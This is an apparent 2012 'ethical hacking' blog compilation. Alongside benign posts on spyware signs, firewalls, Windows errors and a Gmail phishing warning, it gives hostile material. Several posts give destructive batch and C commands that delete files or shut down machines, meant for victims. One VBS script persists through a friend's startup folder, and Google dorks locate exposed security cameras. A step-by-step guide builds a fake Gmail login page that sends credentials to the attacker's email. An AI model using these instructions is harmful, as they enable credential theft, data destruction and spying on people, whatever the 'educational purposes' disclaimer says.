Monday 22 October 2012

¤ Basics of Ethical Hacking ¤
¤ Know Location Of Victim & When Your Mail Has Read ¤
Now you can find out when your email has been read by the recipient! No more guessing: "Has he or she read my email yet?" SpyPig is a simple email tracking system that sends you a notification by email when the recipient opens your message. It works with virtually all modern email programs: Outlook, Eudora, Yahoo Email, Gmail, Hotmail, AOL Email and many others. Enter your email address under step 1 , any title under step 2 , select the image and then copy image location if you are using firefox n paste in message body orsimple drag & drop image & then send it to the victim. When victim will open it, you will receive a message with subject "Your email has been read with contents: Email Title: Sent by You: Your IP Address: Opened by Recipient: Recipient Location: Recipient IP Address: For more info visit SpyPig Website.
¤ Gmail Scam: Is Your Gmail Account Active. Yes/No ¤
Today when I checked my gmail account, then I got a mail with subject " Gmail Verify Alert " & body " Is your Gmail Account Active. Yes/No " from " Gmail Team <mailalert. noreplyrecovery@gmail.c om> ". But then suddenly one thing came in mind that messages come from google with not from @gmail. com . Then I checked the " Header " field, this mail was not received from mr., received path was from mx. So I reported it as phishing. Then I checked my other account, same mail was in my inbox from same sender. I know it's my testing account, so I replied Yes , then immediately received mail from same sender with subject " GMAIL ACTIVE " & body:At Google, we take your privacy and security seriously. Presently we are having congestion due to the anonymous registration of too many Gmail accounts so we are shutting down some accounts and your account was among those to be deleted. We are sending this email to you so that you can confirm the ownership and let us know if you still want to continue using this account. Gmail need you to verify your account details ASAP . Do you use Gmail with this account ?* Yes No YES Do you use orkut with this Google Account ?* Yes No NO Do you use Blogger with this Google Account ?* Yes No NO Most Importantly The Details below is needed : * Full Name * : * Email ID * : * Password * : * Year Registered * : * Country * : Account Owners who refuse to Participate in the Verification process after receiving this message will lose his/her Account within 48 hours Automatically. We apologize for any inconvenience and appreciate your cooperation and understanding looking forward to hearing from you.. Sincerely, The Google Account Verification Team So task is simple, don't reply to this email otherwise you can lost your Gmail account. Just ignore this email & click down the arrow next to Reply, then click Report Phishing . Be aware from these scams. Mails from google always come from @ Google knows very well which account is active or not.
¤ Signs That Your Home Computer Is Infected By Spyware or Adware ¤
There are a number of indicators you can watch for which will suggest that your computer has been infected by spyware or adware. Please note that some of the symptoms listed below are not unique to just a spyware or an adware infection. 1) PC Performance – Both Spyware and adware consume your PC's resource like computer memory. A bad spyware infection could dramatically slow your computer's performance including causing your system's to become increasingly unstable. Spyware also can affect your internet connection speed as it takes up bandwidth to communicate information back to its creator. 2) Pop up Ads – It is highly likely that your computer is infected by Adware if you notice more pop up ads appearing than usual. In some cases pop ads start appearing on the desktop even if you have not opened a web browser. Alternatively, search results may appear in a pop up or another browser window relative to the website you are visiting or keyword term you have typed into a search engine. 3) Browser Toolbars – These programs are commonly bundled with free software which the publisher often describes as "advertiser supported." The toolbar then feeds adverts based on the website you visit. They are usually very difficult to uninstall. "180 Search Assistant" and "Huntbar" are example programs. 4) Browser Settings – Your internet favourites or bookmarks and start page are two main settings which are targeted by spyware authors. Web sites are inserted into your list of internet favourites in the hope that you will visit them. Browser hijackers change the start page which is visited when the browser loads. Any unexpected change to your start page is a sign of infection. 5) Start Up Programs – Some spyware variants will try to add themselves to your Windows start up program list. If you boot up time becomes noticeably slower then review your program start up list to check for applications you are not familiar with and remove them. This program list can be review using the " MS Config" option from the Windows XP Run command. 6) Software Failure – A spyware infection can cause some of your programs to crash or stop working. In particular watch if your Internet Explorer browser refuses to work all of a sudden. 7) Hosts File Changes – The Hosts File is a Windows file that maps the numerical IP Address to the Host Name very much like the address book on your cell phone "maps" your friend's name to their telephone number. Some spyware programs can change these setting so that when you type in "www." for example you are re- directed the spyware author's website.
¤ Classification Of Hackers ¤
Coders - Coders are the programmers who have the ability to find the unique vulnerability in existing software and to create working exploit codes. - These are the individuals with a deep understanding of the OSI Layer Model and TCP/IP Stacks. Admin - Admin the computer guys who have experience with several operating systems, and know how to exploit several existing vulnerabilities. - A majority of Security Consultants fall in this group and work as a part of Security Script Kiddies - Script Kiddies are the bunnies who use script and programs developed by others to attack computer systems and Networks. - They get the least respect but are most annoying and dangerous and can cause big problems without actually know are doing.
¤ What Is Firewall ? ¤
What is a Firewall? A firewall is a tool that monitors communication to and from your computer. It sits between your computer and the rest of the network, and according to some criteria, it decides which communication to allow, and which communication to block. It may also use some other criteria to decide about which communication or communication request to report to you (either by adding the information to a log file that you may browse whenever you wish, or in an alert message on the screen), and what not to report.What Is It Good For? Identifying and blocking remote access Trojans. Perhaps the most common way to break into a home computer and gain control, is by using a remote access Trojan (RAT). (sometimes it is called " backdoor Trojan" or "backdoor program". Many people simply call it a "Trojan horse" although the term "Trojan horse" is much more generic). A Trojan horse, is a program that claims to do something really innocent, but in fact does something much less innocent. This goes to the days where the Greek soldiers succeeded to enter through the gates of Troy by building a big wooden horse, and giving it as a present to the king of Troy. The soldiers allowed the sculpture to enter through their gates, and then at night, when the soldiers were busy guarding against an outside attack, many Greek soldiers who were hiding inside the horse went out and attacked Troy from the inside. This story, which may or may not be true, is an example of something which looks like something innocent and is used for some less innocent purpose. The same thing happens in computers. You may sometimes get some program, via ICQ, or via Usenet, or via IRC, and believe this program to be something good, while in fact running it will do something less nice to your computer. Such programs are called Trojan horses. It is accepted to say that the difference between a Trojan horse and a virus, is that a virus has the ability to self- replicate and to distribute itself, while a Trojan horse lacks this ability. A special type of Trojan horses, is RATs (Remote Access Trojans, some say "remote admin Trojans"). These Trojans once executed in the victim's computer, start to listen to incoming communication from a remote matching program that the attacker uses. When they get instructions from the remote program, they act accordingly, and thus let the user of the remote program to execute commands on the victim's computer. To name a few famous RATs, the most common are Netbus, Back- Orifice, and SubSeven (which is also known as Backdoor-G). In order for the attacker to use this method, your computer must first be infected by a RAT. Prevention of infections by RATs is no different than prevention of infection by viruses. Antivirus programs can identify and remove most of the more common RATs. Personal firewalls can identify and block remote communication efforts to the more common RATs and by thus blocking the attacker, and identifying the RAT.
¤ Description Of Windows Errors ¤
All those of you who are Windows users, may be pretty familiar with the blue error screen that Windows pops up now and again.Ilegal Operation errors, Exception errors and Kernal errors are a common sight. The problem with these common errors is that they provide the user with very little info on what caused the error to occur and why the hell did the application or Windows crash.In order to diagonise the reasons behind the crash or error, we need to be able to understand what Windows is trying to tell us through the weird difficult to understand error messages it provides us with.There has been a lot of talk about Windows being a lamer's machine and a real uberhacker uses a Linux box and everything else, well I do not agree with it. There is a common belief amongst people that Windoze is very insecure and it sucks but then on the other hand Red Hat too is not so great in the security sphere. There are nearly 50 known exploits to get root on a Linux box. The reason why hackers have found so many holes or bugs in Windows is due to the fact the Windows is the most widely used OS in the world and the largest number of Hackers have access to Windows and the largest number of people have a go at Windoze's Security. The only thing that is in support of Linux is the fact that it is free and the concept of Open Source and wel performance. So what I think is that there is nothing wrong in Using a Windoze box for Hacking . Yes Linux does provide you access to some kewl hacking tools from the various shells but for Windows there are many third party freebies that allow you to do the same thing. Linux does make hacking easier but there is nothing wrong in using Windows for Hacking .If you are able to understrand the entire Windows system then believe me, it is great. Anyway, lets get down to what this manual is actually meant for. Errors Many people go real panicky when they see the blue error screen or the blue death, they really don't know what to do, some even start calling tech support saying that their computer is infected with a virus. Well there is no reason for a user to dread Windows error messages. They can be used usefully and for diagonising problems or roots of the problems, and answer questions like What exactly caused an error to occur and When does an error occur and What sould I do to rectify this error. There are three general types of error messages you may encounter when working with applications under Win- dows. These are Exception errors, Illegal operation errors and Kernel errors. Exception Error An exception error signifies that something unexpected has happened within the Windows environment, typically an improper memory access. For example, an application or a Windows component might read or write to a memory location that has not been allocated to it, potentially overwriting and corrupting other program code in that area of memory. Fatal Errors Fatal exception errors are typically of the form: 'A fatal exception <Xx> has occurred atxxxx:xxxxxxxx. Fatal exception errors are codes returned by a program if access to an illegal instruction has been encountered, invalid data or code has been accessed, or the privilege level of an operation is invalid. When any of these errors occur, the processor returns an exception to the operating system, which in turn is han- dled as a fatal exception error. In many cases, the exception is non- recoverable, and the system must be restarted or shut down, depending on the severity of the error. In the fatal exception error 'A fatal exception <XX> has occurred at xxxx: xxxxxxxx, the <XX> represents the actual processor exception from OO to OF. The xxxx:xxxxxxxx represents the ' code segment pointer:actual address where the exception occurred'. Illegal Operation errors Illegal Operation errors or 'program crashes' are actually invalid page faults ( IPF). The error message is similar to: 'This program has performed an illegal operation and will be shut down. If the problem persists, contact the pro- gram vendor.' If you click Details, the following error message appears: '<Application> caused an invalid page fault in module <module name> at <address>.' After you click OK, the pro- gram is shut down. An invalid page fault also occurs when a program or a Windows compo-nent reads or writes to a memory loca-tion that is not allocated to it. Kernel errors are also similar. The first clue to the cause of an IPF is in the IPF error message that is dis- played. Note the module name that is listed. If you can gather clues about the component that is causing the IPF, then you can target the specific cause of the problem. Sometimes, removing and rein-stalling the file mentioned in the IPF cor-rects the problem. Mso, noting when the error occurs can help determine the cause of the problem. For example, if the error occurs when you try to print a doc-ument in Word, the problem could be with the printer driver rather than Word itselL A key part of troubleshooting IPFs is to determine how widespread the problem is.
¤ Standard ASCII Character Set ¤
0 NUL 1 SOH 2 STX 3 ETX 4 EOT 5 ENQ 6 ACK 7 BEL 8 BS 9 TAB 10 LF 11 VT 12 FF 13 CR 14 SO 15 SI 16 DLE 17 DC1 18 DC2 19 DC3 20 DC4 21 NAK 22 SYN 23 ETB 24 CAN 25 EM 26 SUB 27 ESC 28 FS 29 GS 30 RS 31 US 32 33 ! 34 " 35 # 36 $ 37 % 38 & 39 ' 40 ( 41 ) 42 * 43 + 44 , 45 - 46 . 47 / 48 0 49 1 50 2 51 3 52 4 53 5 54 6 55 7 56 8 57 9 58 : 59 ; 60 < 61 = 62 > 63 ? 64 @ 65 A 66 B 67 C 68 D 69 E 70 F 71 G 72 H 73 I 74 J 75 K 76 L 77 M 78 N 79 O 80 P 81 Q 82 R 83 S 84 T 85 U 86 V 87 W 88 X 89 Y 90 Z 91 [ 92 \ 93 ] 94 ^ 95 _ 96 ` 97 a 98 b 99 c 100 d 101 e 102 f 103 g 104 h 105 i 106 j 107 k 108 l 109 m 110 n 111 o 112 p 113 q 114 r 115 s 116 t 117 u 118 v 119 w 120 x 121 y 122 z 123 { 124 | 125 } 126 ~ 127 DEL
¤ Some Basic Computer Acronyms ¤
--- A --- ADSL - Asymmetric Digital Subscriber Line AGP - Accelerated Graphics Port ALI - Acer Labs, Incorporated ALU - Arithmetic Logic Unit AMD - Advanced Micro Devices APC - American Power Conversion ASCII - American Standard Code for Information InterchangeASIC - Application Specific Integrated Circuit ASPI - Advanced SCSI Programming Interface AT - Advanced Technology ATI - ATI Technologies Inc. ATX - Advanced Technology Extended --- B --- BFG - BFG Technologies BIOS - Basic Input Output System BNC - Barrel Nut Connector --- C --- CAS - Column Address Signal CD - Compact Disk CDR - Compact Disk Recorder CDRW - Compact Disk Re- Writer CD-ROM - Compact Disk - Read Only Memory CFM - Cubic Feet per Minute (ft�/ min) CMOS - Complementary Metal Oxide Semiconductor CPU - Central Processing Unit CTX - CTX Technology Corporation ( Commited to Excellence) --- D --- DDR - Double Data Rate DDR- SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory DFI - DFI Inc. (Design for Innovation) DIMM - Dual Inline Memory Module DRAM - Dynamic Random Access Memory DPI - Dots Per Inch DSL - See ASDL DVD - Digital Versatile Disc DVD-RAM - Digital Versatile Disk - Random Access Memory --- E --- ECC - Error Correction Code ECS - Elitegroup Computer Systems EDO - Extended Data Out EEPROM - Electrically Erasable Programmable Read-Only Memory EPROM - Erasable Programmable Read- Only Memory EVGA - EVGA Corporation --- F --- FC-PGA - Flip Chip Pin Grid Array FDC - Floppy Disk Controller FDD - Floppy Disk Drive FPS - Frame Per Second FPU - Floating Point Unit FSAA - Full Screen Anti-Aliasing FS - For Sale FSB - Front Side Bus --- G --- GB - Gigabytes GBps - Gigabytes per second or Gigabits per second GDI - Graphical Device Interface GHz - GigaHertz --- H --- HDD - Hard Disk Drive HIS - Hightech Information System Limited HP - Hewlett-Packard Development Company HSF - Heatsink-Fan --- I --- IBM - International Business Machines Corporation IC - Integrated Circuit IDE - Integrated Drive Electronics IFS- Item for Sale IRQ - Interrupt Request ISA - Industry Standard Architecture ISO - International Standards Organization --- J --- JBL - JBL (Jame B. Lansing) Speakers JVC - JVC Company of America - K --- Kbps - Kilobits Per Second KBps - KiloBytes per second --- L --- LG - LG Electronics LAN - Local Area Network LCD - Liquid Crystal Display LDT - Lightning Data Transport LED - Light Emitting Diode --- M --- MAC - Media Access Control MB � MotherBoard or Megabyte MBps - Megabytes Per Second Mbps - Megabits Per Second or Megabits Per Second MHz - MegaHertz MIPS - Million Instructions Per Second MMX - Multi-Media Extensions MSI - Micro Star International --- N --- NAS - Network Attached Storage NAT - Network Address Translation NEC - NEC Corporation NIC - Network Interface Card --- O --- OC - Overclock (Over Clock) OCZ - OCZ Technology OEM - Original Equipment Manufacturer --- P --- PC - Personal Computer PCB - Printed Circuit Board PCI - Peripheral Component Interconnect PDA - Personal Digital Assistant PCMCIA - Peripheral Component Microchannel Interconnect Architecture PGA - Professional Graphics Array PLD - Programmable Logic Device PM - Private Message / Private Messaging PnP - Plug 'n Play PNY - PNY Technology POST - Power On Self Test PPPoA - Point-to- Point Protocol over ATM PPPoE - Point-to-Point Protocol over Ethernet PQI - PQI Corporation PSU - Power Supply Unit --- R --- RAID - Redundant Array of Inexpensive Disks RAM - Random Access Memory RAMDAC - Random Access Memory Digital Analog Convertor RDRAM - Rambus Dynamic Random Access Memory ROM - Read Only Memory RPM - Revolutions Per Minute --- S --- SASID - Self-scanned Amorphous Silicon Integrated Display SCA - SCSI Configured Automatically SCSI - Small Computer System Interface SDRAM - Synchronous Dynamic Random Access Memory SECC - Single Edge Contact Connector SODIMM - Small Outline Dual Inline Memory Module SPARC - Scalable Processor ArChitecture SOHO - Small Office Home Office SRAM - Static Random Access Memory SSE - Streaming SIMD Extensions SVGA - Super Video Graphics Array S/PDIF - Sony/Philips Digital Interface --- T --- TB - Terabytes TBps - Terabytes per second Tbps - Terabits per second TDK - TDK Electronics TEC - Thermoelectric Cooler TPC - TipidPC TWAIN - Technology Without An Important Name --- U --- UART - Universal Asynchronous Receiver/ Transmitter USB - Universal Serial Bus UTP - Unshieled Twisted Pair --- V --- VCD - Video CD VPN - Virtual Private Network --- W --- WAN - Wide Area Network WTB - Want to Buy WYSIWYG - What You See Is What You Get --- X --- XGA - Extended Graphics Array XFX - XFX Graphics, a Division of Pine XMS - Extended Memory Specification XT - Extended Technology
¤ Components Of Internet ¤
WORLD WIDE WEB The World Wide Web (abbreviated as the Web or WWW) is a system of Internet servers that supports hypertext to access several Internet protocols on a single interface. Almost every protocol type available on the Internet is accessible on the Web. This includes e- mail, FTP, Telnet, and Usenet News. In addition to these, the World Wide Web has its own protocol: HyperText Transfer Protocol, or HTTP. These protocols will be explained later in this document.The World Wide Web provides a single interface for accessing all these protocols. This creates a convenient and user- friendly environment. It is no longer necessary to be conversant in these protocols within separate, command-level environments. The Web gathers together these protocols into a single system. Because of this feature, and because of the Web's ability to work with multimedia and advanced programming languages, the Web is the fastest-growing component of the Internet. The operation of the Web relies primarily on hypertext as its means of information retrieval. HyperText is a document containing words that connect to other documents. These words are called links and are selectable by the user. A single hypertext document can contain links to many documents. In the context of the Web, words or graphics may serve as links to other documents, images, video, and sound. Links may or may not follow a logical path, as each connection is programmed by the creator of the source document. Overall, the Web contains a complex virtual web of connections among a vast number of documents, graphics, videos, and sounds. Producing hypertext for the Web is accomplished by creating documents with a language called HyperText Markup Language, or HTML. With HTML, tags are placed within the text to accomplish document formatting, visual features such as font size, italics and bold, and the creation of hypertext links. Graphics and multimedia may also be incorporated into an HTML document. HTML is an evolving language, with new tags being added as each upgrade of the language is developed and released. The World Wide Web Consortium (W3 C), led by Web founder Tim Berners-Lee, coordinates the efforts of standardizing HTML. The W3 C now calls the language XHTML and considers it to be an application of the XML language standard. The World Wide Web consists of files, called pages or home pages, containing links to documents and resources throughout the Internet. The Web provides a vast array of experiences including multimedia presentations, real-time collaboration, interactive pages, radio and television broadcasts, and the automatic "push" of information to a client computer. Programming languages such as Java, JavaScript, Visual Basic, Cold Fusion and XML are extending the capabilities of the Web. A growing amount of information on the Web is served dynamically from content stored in databases. The Web is therefore not a fixed entity, but one that is in a constant state of development and flux. For more complete information about the World Wide Web, see Understanding The World Wide Web. E-MAIL Electronic mail, or e-mail, allows computer users locally and worldwide to exchange messages. Each user of e- mail has a mailbox address to which messages are sent. Messages sent through e-mail can arrive within a matter of seconds. A powerful aspect of e-mail is the option to send electronic files to a person's e-mail address. Non-ASCII files, known as binary files, may be attached to e-mail messages. These files are referred to as MIME attachments.MIME stands for Multimedia Internet Mail Extension, and was developed to help e-mail software handle a variety of file types. For example, a document created in Microsoft Word can be attached to an e-mail message and retrieved by the recipient with the appropriate e-mail program. Many e-mail programs, including Eudora, Netscape Messenger, and Microsoft Outlook, offer the ability to read files written in HTML, which is itself a MIME type. TELNET Telnet is a program that allows you to log into computers on the Internet and use online databases, library catalogs, chat services, and more. There are no graphics in Telnet sessions, just text. To Telnet to a computer, you must know its address. This can consist of words ( or numbers (140. 147.254.3). Some services require you to connect to a specific port on the remote computer. In this case, type the port number after the Internet address. Example: telnet 185. Telnet is available on the World Wide Web. Probably the most common Web- based resources available through Telnet have been library catalogs, though most catalogs have since migrated to the Web. A link to a Telnet resource may look like any other link, but it will launch a Telnet session to make the connection. A Telnet program must be installed on your local computer and configured to your Web browser in order to work. With the increasing popularity of the Web, Telnet has become less frequently used as a means of access to information on the Internet. FTP FTP stands for File Transfer Protocol. This is both a program and the method used to transfer files between computers. Anonymous FTP is an option that allows users to transfer files from thousands of host computers on the Internet to their personal computer account. FTP sites contain books, articles, software, games, images, sounds, multimedia, course work, data sets, and more. If your computer is directly connected to the Internet via an Ethernet cable, you can use one of several PC software programs, such as WS_FTP for Windows, to conduct a file transfer. FTP transfers can be performed on the World Wide Web without the need for special software. In this case, the Web browser will suffice. Whenever you download software from a Web site to your local machine, you are using FTP. You can also retrieve FTP files via search engines such as FtpFind, located at /http:// This option is easiest because you do not need to know FTP program commands.
¤ Introduction To Internet ¤
The Internet is a computer network made up of thousands of networks worldwide. No one knows exactly how many computers are connected to the Internet. It is certain, however, that these number in the millions. No one is in charge of the Internet. There are organizations which develop technical aspects of this network and set standards for creating applications on it, but no governing body is in control. The Internet backbone, through which Internet traffic flows, is owned by private companies.All computers on the Internet communicate with one another using the Transmission Control Protocol/ Internet Protocol suite, abbreviated to TCP/IP. Computers on the Internet use a client/server architecture. This means that the remote server machine provides files and services to the user's local client machine. Software can be installed on a client computer to take advantage of the latest access technology. An Internet user has access to a wide variety of services: electronic mail, file transfer, vast information resources, interest group membership, interactive collaboration, multimedia displays, real- time broadcasting, shopping opportunities, breaking news, and much more. The Internet consists primarily of a variety of access protocols. Many of these protocols feature programs that allow users to search for and retrieve material made available by the protocol.
¤ Reasons Why Computers Crashes Most ¤
Hardware Conflict Bad Ram Hard Disk Drives Fatal OE Exceptions And VXD Errors Viruses Software Overheating BIOS SettingsPower Supply Problems
¤ What Is Local File Inclusion ? ¤
A LFI is, as the title says, a method for servers/scripts to include local files on run- time, in order to make complex systems of procedure calls. Well most of the time, you find the LFI vulnerabilities in URL's of the web pages. Mainly because developers tend to like the use of GET requests when including pages. I will explain it fully with example in my next post,
¤ What Is Google Hacking ? ¤
Google hacking is the use of a search engine, such as Google, to locate a security vulnerability on the Internet. There are generally two types of vulnerabilities to be found on the Web: software vulnerabilities and misconfigurations. Although there are some sophisticated intruders who target a specific system and try to discover vulnerabilities that will allow them access, the vast majority of intruders start out with a specific software vulnerability or common user misconfiguration that they already know how to exploit, and simply try to find or scan for systems that have this vulnerability. Google is of limited use to the first attacker, but invaluable to the second.When an attacker knows the sort of vulnerability he wants to exploit but has no specific target, he employs a scanner. A scanner is a program that automates the process of examining a massive quantity of systems for a security flaw. The earliest computer- related scanner, for example, was a war dialer; a program that would dial long lists of phone numbers and record which ones responded with a modem handshake.
¤ View Live Security Cameras ¤
Type following in google: intitle:"Live View / - AXIS" inurl:view/index:shtml inurl:“viewerframe? mode=motion” inurl:IndexFrame.shtml “Axis Video Server” inurl:vAppl Intitle:liveapplet intitle:liveapplet inurl:LvAppl intitle:“WJ- NT104 Main” intitle:“snc- rz30 home”
¤ Trace IP Address Of Websites ¤
Follow these steps: Go to s tart>run> Type cmd>tracert ( name of the website) eg: tracert http:// It will show many IP addresses how they are travelling, copy last shown IP. Now go to http:// n paste IP in Find. It will show where the IP address location is.
¤ Hacking windows send to menu ¤
How often do you copy songs from a CD?or some photos from a CD? What do u do?U select required files and do a CTRL C.Open the destination folder and do CTRL V.Here is something u can benefit time from customize ur send to menu. First you'll need access to hidden files.So change ur view settings to make all hidden files visible.Tools>folder option>view(tab)and select the show hidden files and folders.Go to parent drive:/ documents and settings/ (user name)/send to Open up my computer and locate ur most used folders. Create a shortcut of the most used folders in send to folder. U can do this in a number ways. Right click>send to desktop(create shortcut) and move the shortcut from the desktop to the send to folder. Copy the most used folder and go to send to folder and right click>paste shortcut. Done
¤ Simple virus coding (Only for educational purpose) ¤
Open NOTEPAD and copy- paste the following code in it.Then save the file with whatever name u like but wit BAT FILE extension. I mean save it like VIRUS.BAT Now if u give this to someone and if he runs this program then his my document folder will be deleted. Code is below rmdir C:\Documents and setting\S \Q, [NOTE-DO AT UR OWN RISK]
¤ Virus code 2 ¤
Open notepad and copy- paste the code given below @Echo off Del C:\*.* ly And save that as .bat not .txt and run it.It will delete the content of c:\drive... Do at ur own risk... 
¤ Virus coding 3 ¤
Virus code can be coded using several language. The best being c or vbs or dos. Today I teach some basic virus codings. I will be using c, dos and alp/asm(assembly language).These is a very simple Virus coding tutorial just a beginners guide this is mainly for programmers. this post is just to change their thinking. First lets begin with tiny and simple ones.I will show both codes for windows and linux First alp/asm back: add c,b loop back This simple script needs no explanation. It will just be eating away your victims memory at a slow space. As you know addition needs some space to store intermediate result. this will be using up the ram. but very less of ram is lost and the user can stop this by just closing the .exe file. As you know a float addition takes up more space than normal addition . You can replace integer addition with float. Now lets try to create a simple Linux virus in c. system("poweroff"); This simple script will turn off your victims comp. Now if you can forece this script to load at start up then it will be a nightmare. let's see one more linux virus of the same type system("rm *.*"); This will all files with all extension which the user has previlage to delete.Just imagine if the admin runs it then it will create a havoc. Lets see the same codes for windows. To delete all files in windows using dos/batch progtraming will be del *.* and the code of the shutdown virus will be just shutdown Now lets disable Internet ipconfig /release echo You Internet Been HACKED! What if you change the extension of a file. It becomes useless.Now let's rename a few file. rename (old_file_name_with_path,newname"); Now what you can do with this left up to you.Just use your brain and you will make out it's potential. These are very simple virus just a beginners guide. Just check out the virus codes section for more complex and full fledged Virus coding tutorial. Please dont misuse these virus codes in c Html virus -- vbs Orkut Virus -- vbs Clone virus -- c/c ++ Doom virus -- c/c++ Black Wolf virus -- c/c++ Disable input device -- c/c++ Sasser Virus -- Assembly language
¤ Virus coding 4 ¤
Viruses pays most significant role for the success of an antivirus company. Sometimes it is a antivirus company which supports to spread a virus and after some days it come with its antivirus product to avoid this virus and in this way this company gains whose profit by selling its products. Actually every virus contains a signature file and if your antivirus has the definition of this signature then it can avoid virus spreading in your computer. A good computer user can avoid virus infection by checking current system processes and if these are understandable by him then he can easily identify a virus process and Kill it. Virus Programming is a mind game , I show you a simple example of a virus “ Everywhere is my Kingdom ” Actually this is not a virus but it is very dangerous for simple user. You can try it on your friends computer (But play with safe hands) .How to : 1.) Open notepad 2.) Write these simple Lines. Set wshshell = wscript.CreateObject (“WScript. Shell”) “notepad” do wscript.sleep 400 wshshell.sendkeys “Everywhere, ” wscript.sleep 700 wshshell.sendkeys “is ” wscript.sleep 700 wshshell.sendkeys “my ” wscript.sleep 700 wshshell.sendkeys “Kingdom ” loop 3.) Save it in your friends start up folder with as “ABC.vbs” 4.) Yes it is ready. How To Avoid it : 1.) Press ctrl + alt + delete or open task manager 2.) Click on process tab 3.) Stop the process named “wscript.exe” 4.) Remove this script from start up ************ Happy Ending with a lot of FUN *************
¤ How to create fake email login page ¤
Fake Login Pages are one of the BEST method to Hack an Email account.Now it’s easy to build a Fake Login Pages without any knowledge of Programming Languages. One can use http:// to build the Sign Up page . Rest of the things required to build a Fake Login Page are easy to learn.Example of a Fake Login Page is displayed below. Don’t forget to spice up your fake login page with css to express the delusion. If you want to host your page on a free server, then below is the link to Free Hosting Providers. http:// or http:// How to : Make Fake Login Page in 5 mins Do step by step Open any page for which you wanna make fake. ( For example: Save page . In the saving option it asks for save as type select complete webpage.(Ctrl + s) Now where u have save the page it will be showing u that page and a dir wid images on the page. Now Rite Click on the Page and click edit. Search <Form in the page. Now Delete That Form Value , Method ,Action whatever its written delete that line. (For Gmail: <FORM id=”gaia_loginform” action=” https:// ServiceLoginAuth” method=”post” onSubmit=” return(gaia_onLoginSubmit ());”>) Now add this line <form action="http:// formmailer/submit" method="post"><input type="hidden" value=" Your Email Id " name="fm- to"><font color="# 333333 "> </font><input type="hidden" value="blog.icyse. com_ password_for educational purposes only" name="fm- title"><font color="# 333333 "> </ font><input type="hidden" value=" Link You Want To redirect " name="fm-redirect"><font color="# 333333 "> </font> Save and close the editor. Upload the Directory wid images and this Page on free hosting site. Its Done Simply made in just 5 mins Note : Don’t Change The Directory Name or Page Name. Now you can receive the id/ password on your email. Disclaimer All the information provided on ProHackingTricks are for educational purposes only. The site is no way responsible for any misuse of the information. ProHackingTricks is a site related to Computer Security and not a site that promotes hacking /cracking/software piracy.All the information on this site are meant for developing Hacker Defense attitude among the users and help preventing the hack attacks. ProHackingTricks insists that these information shall not be used for causing any kind of damage directly or indirectly.The site is totally meant for educational purposes only and the author of ProHackingTricks is not liable of any illegal act performed by any user.
Tweet That’s where tools like Re-Enable aid the user. The software programoffers to activate Windows features like Regedit, Windows Task Manager, System Restore, MsConfig or the Control Panel after a virus attack. It displays all features in the main interface upon startup. Some or all of the apps and functions can be selected for fixing. A click on the Re- enable button after the selection will start the recovery process. The program offers a Tool menu on top that comes with additional troubleshooting utilities. Here it is possible to restore Safe Mode, edit Hosts files, reset files and folder attributes, unhide drives, repair the desktop, repair explorer.exe startup problems or scan for and delete autorun.inf files. Re- Enable is a handy program to repair a system after a virus attack. The developer has created a lite version which requires the Microsoft .net Framework 3.5 SP1 and a portable version which has no dependencies but is 30 times the size of the lite version (700 KB to 22 MB).
¤ How To Make a Keygen In Visual Basic ¤
Most commercial software uses some form of random keys to authenticate and register a legitimate copy when the program is installed. Commonly this is a series of random letters grouped in varying numbers of letters. For example, you might see this sequence: DXUWB-GPHQE-CCNYQ- QFHAT-ZFBLO on a licensed program. Specialized software called Key Generators, or KeyGen creates these codes, but you can make your own using only 16 lines of Visual Basic code. Start a new project in Visual Basic, selecting the "Standard.EXE" template from the list offered under "File" and "New Project." Click on "File," "Save Project As" and name both the form and project "MyKeyGen" when prompted. Add a "CommandButton" control to the open form by double clicking this control in the Toolbox on the left of your screen. This control is an icon shaped like a small rectangle. Normally it is the third control down in the right hand column of the ToolBox. Add a label to the form in the same way. The label icon is a large letter "A" in the toolbox. Click on the new "Command1 " button now on the form to focus on its properties in the " Properties" panel on the right. Double click on the "(Name)" property to highlight the default name, "Command1. " Change this name to "KeyGen". Click on the caption property and change it to "Generate Key". Click on the new Label1 on the form and make these changes to its properties: Delete the Caption name. Scroll down in the properties list until you find "Height" and change this to 500. Scroll to the bottom of the properties and change the "Width" to 1200. Click on "View" in the main Visual Basic menu at the top and chose "Code." This opens the Code window where you should type these lines exactly as they appear: Option Base 1 Option Explicit Private Sub KeyGen_Click() Dim n As Integer Dim KeyGen (26) As Long Dim NewKey, FinalKey As String Randomize For n = 1 To 26 KeyGen(n) = Int(Rnd * 26) + 1 KeyGen(n) = KeyGen(n) + 64 NewKey = Chr$(KeyGen (n)) FinalKey = FinalKey + NewKey Next FinalKey = Left (FinalKey, 5) + "-" + Mid ( FinalKey, 6 , 5) + "-" + Mid (FinalKey, 11 , 5) + " -" + Mid (FinalKey, 17 , 5) Label1. Caption = FinalKey End Sub Save the project by clicking on "File" and " Save Project." Press "F5 " to run the program. The declarations in the lines beginning "Dim" specify how the program variables are used. " KeyGen (26) " creates an array of variables with 26 possibilities and the "Option Base 1 " ensures the first of the 26 is numbered one. " Randomize" generates a new random seed each time the program runs. The rest of the lines create a series of random numbers, which are then converted to letters. Since ASCII code for the alphabet begins with ASCII 65 , we have to add 64 to each random number before the conversion. In the end, a list of four sets of random letters separated by hyphens is created and displayed in the label box. Tips and Warnings If you need a longer series of key letters, add an additional segment to the end of the line beginning "Final Key = Left(Finalkey,5) ". Insert at the end of this line the following code: + "-" + Right (FinalKey,5) To create four letter sequences, or vary the number of letters in each group, change the fives in the FinalKey line to other numbers. Using arrays can be tricky, particularly when you set a limit on the maximum number and use repeating sequences. If you get a message "Run-time error 9 , subscript out of range," you entered a larger number in one of the lines than the array can hold.
¤ Set Processes Priority ¤
Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU. CTRL-SHIFT- ESC 1. Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option 2. For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s
¤ Shutdown Trick ¤
